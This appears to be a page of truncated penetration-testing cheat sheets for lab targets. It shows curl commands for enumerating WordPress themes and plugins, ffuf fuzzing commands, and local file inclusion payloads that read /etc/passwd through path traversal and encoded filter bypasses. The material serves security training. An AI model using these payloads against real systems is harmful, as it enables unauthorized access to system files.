CURL

Wordpress curl -s http://blog.inlanefreight.local | grep WordPress curl -s http://blog.inlanefreight.local/ | grep themes curl -s http://blog.inlanefreight.local/ | grep plugins curl -s http://blog.inlanefreight.local/?p=1 | grep plugins
Fuff – Cheat Sheet

Fuff – Cheat Sheet

Ffuf commands CommandDescriptionffuf -hffuf helpffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZDirectory Fuzzingffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZExtension Fuzzingffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.phpPage Fuzzingffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -vRecursive…
File Inclusion – Cheat Sheet

File Inclusion – Cheat Sheet

Local File Inclusion CommandDescription Basic LFI /index.php?language=/etc/passwdBasic LFI /index.php?language=../../../../etc/passwdLFI with path traversal /index.php?language=/../../../etc/passwdLFI with name prefix /index.php?language=./languages/../../../../etc/passwdLFI with approved path LFI Bypasses /index.php?language=....//....//....//....//etc/passwdBypass basic path traversal filter /index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64Bypass filters with URL encoding /index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]Bypass appended extension with…